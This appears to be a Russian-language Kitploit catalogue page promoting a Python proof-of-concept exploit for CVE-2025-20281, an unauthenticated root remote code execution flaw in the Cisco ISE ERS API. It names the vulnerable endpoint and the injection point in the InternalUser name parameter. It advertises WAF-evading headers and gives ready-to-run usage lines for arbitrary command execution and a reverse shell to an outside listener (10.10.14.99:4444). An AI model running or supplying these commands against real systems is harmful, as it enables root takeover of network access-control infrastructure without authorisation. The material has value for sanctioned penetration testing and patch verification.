Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Cisco-CVE-2025-20281-illdeed — Эксплойт для неаутентифицированного удаленного выполнения кода CVE-2025-20281 в Cisco ISE ERS API. Выполняйте команды или запускайте обратные оболочки от имени root — аутентификация не требуется. | Kitploit
Инструменты/GitHubGitHub/ill-deed/cisco-cve-2025-20281-illdeed
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubill-deed/cisco-cve-2025-20281-illdeed

Cisco-CVE-2025-20281-illdeed

Эксплойт для неаутентифицированного удаленного выполнения кода CVE-2025-20281 в Cisco ISE ERS API. Выполняйте команды или запускайте обратные оболочки от имени root — аутентификация не требуется.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
521 год назадЕщё не проверено

CVE-2025-20281 — Эксплойт для неавторизованного удаленного выполнения кода (RCE) через API ERS в Cisco ISE

Этот репозиторий содержит эксплойт для проверки концепции на Python 3 для CVE-2025-20281, критической уязвимости в Cisco Identity Services Engine (ISE), которая позволяет неавторизованное удаленное выполнение кода (RCE) с правами root через API ERS.


🩻 Обзор уязвимости

Конечная точка /ers/sdk#_ в ERS Cisco ISE не проверяет аутентификацию при обработке запросов на создание пользователя.
Внедряя команды оболочки в параметр name объекта InternalUser, злоумышленники могут добиться выполнения команд с правами root.

  • CVE ID: CVE-2025-20281
  • Затронуты: Cisco ISE PAN (Policy Admin Node) с включенным ERS
  • Серьезность: Критическая (CVSS 9.8)
  • Аутентификация: Не требуется

⚙️ Возможности

  • ✅ Выполнение произвольных команд (--cmd)
  • ✅ Быстрый тест с помощью --whoami
  • ✅ Запуск реверсивной оболочки (--reverse)
  • ✅ Не требует аутентификации или токена сессии
  • ✅ Подавление предупреждений SSL и чистый вывод
  • ✅ Легитимные заголовки для обхода простых WAF

🚀 Использование

root@kitploit:~
python3 CVE-2025-20281.py TARGET [--whoami | --cmd "id" | --reverse LHOST LPORT]

Примеры

Тестовая команда:

root@kitploit:~
python3 CVE-2025-20281.py 192.168.1.10 --whoami

Выполнить пользовательскую команду:

root@kitploit:~
python3 CVE-2025-20281.py 192.168.1.10 --cmd "id && hostname"

Реверсивная оболочка:

root@kitploit:~
python3 CVE-2025-20281.py 192.168.1.10 --reverse 10.10.14.99 4444

⚠️ Правовое предупреждение

Этот код предоставлен только для образовательных целей и авторизованного тестирования. Не используйте это программное обеспечение против сетей или систем, которыми вы не владеете или на тестирование которых у вас нет разрешения.


🙏 Благодарности

Уязвимость: раскрыта через уведомление Cisco

Рефакторинг PoC: illdeed

Скачать инструмент